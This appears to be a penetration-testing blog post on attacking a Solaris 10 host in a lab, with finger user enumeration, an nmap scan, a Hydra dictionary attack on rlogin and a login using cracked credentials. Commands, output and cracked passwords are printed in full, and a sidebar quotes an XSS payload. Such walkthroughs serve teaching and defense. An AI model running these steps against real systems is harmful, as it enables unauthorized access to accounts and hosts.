Tuesday, April 23, 2019

Attacking fingerd and rlogin on Solaris 10

The rlogin service has known security issues and is better turned off to use better tools such as SSH to handle login procedures. What follows is a penetration test of a Solaris 10 server running fingerd and rlogin. To start off lets first scan the suspected host for any open ports.

Scanning the host

root@asus:~/pentest_notes% nmap -sV -O -p79,513 osiris.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-26 23:05 MST
Nmap scan report for osiris.acme.com
Host is up (0.0022s latency).
PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
513/tcp open  login
MAC Address: 08:00:27:63:61:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Sun Solaris 9|10, Sun OpenSolaris
OS CPE: cpe:/o:sun:sunos:5.9 cpe:/o:sun:sunos:5.10 cpe:/o:sun:opensolaris
OS details: Sun Solaris 9 or 10, Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b
Network Distance: 1 hop
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.68 seconds
root@asus:~/pentest_notes%

Here we see we have two ports open, the fingerd process and the rlogin service on port 513. Our next step is to try and query the finger daemon to see if there are any connected users currently on the system.

Query the finger daemon

root@asus:~/pentest_notes% finger @osiris.acme.com
Login       Name               TTY         Idle    When    Where
root     Super-User            console        3 Wed 22:37  :0                  
stacey          ???            pts/3          1 Wed 22:39  192.168.0.100       
larry           ???            pts/4            Wed 22:21  192.168.0.132       
barrett         ???            pts/5            Wed 22:44  192.168.0.33       
slade           ???            pts/6            Wed 22:40  192.168.0.10
hayes           ???            pts/7            Wed 22:11  192.168.0.232
virginia        ???            pts/8            Wed 22:05  192.168.0.5
root@asus:~/pentest_notes%

This is the list of usernames we will use to try and guess a correct login/passwd combnation for. if we go further and query a specfic user we see that what is returned is the username and the remote host where the user is connecting from which gives us insight in to how their internal network is addressed. 

root@asus:~/pentest_notes% finger larry@osiris.acme.com
Login       Name               TTY         Idle    When    Where
larry           ???            pts/4            Wed 22:40  192.168.0.132       
root@asus:~/pentest_notes%

Now we can try and gain access to the remote host by a dictonary attack using our enumerated names, the rockyou wordlist and the Hydra tool.

Using Hydra to crack remote logins

root@asus:~/pentest_notes% hydra -L rlogin-users.txt -P rockyou.txt rlogin://osiris.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-26 22:55:17
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service telnet on port 23
[513][rlogin] host: osiris.acme.com   login: larry   password: bc04hnu
[513][rlogin] host: osiris.acme.com   login: barrett   password: 3633mb
[513][rlogin] host: osiris.acme.com   login: slade   password: zenun77
[513][rlogin] host: osiris.acme.com   login: hayes   password: cubby1
[513][rlogin] host: osiris.acme.com   login: virginia   password: sexy1984
1 of 1 target successfully completed, 5 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-26 22:55:50
root@asus:~/pentest_notes%

Once we have found some successful login combinations, its now time to try and see if any of the logins work on the remote host. For this we will be using rlogin to verify out results.

Testing remote logins

root@asus:~/pentest_notes% rlogin osiris.acme.com -l virginia
The authenticity of host 'osiris.acme.com (192.168.0.130n)' can't be established.
RSA key fingerprint is SHA256:pqvyzr0herRl6SBTTwJdx5K4kfNjbTkoU4boVeE983I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'osiris.acme.com' (RSA) to the list of known hosts.
Password: 
Last login: Wed Dec 26 23:25:18 2018 from 192.168.0.100
Oracle Corporation      SunOS 5.10      Generic Patch   January 2005
$ id
uid=108(virginia) gid=1(other)
$ exit
Connection to osiris.acme.com closed.
root@asus:~/pentest_notes%
As you can see we found a succesful login and now have a local shell on the remote host we can work from to try and further gain higher privleges.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Exploiting Weak WEBDAV Configurations
    The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...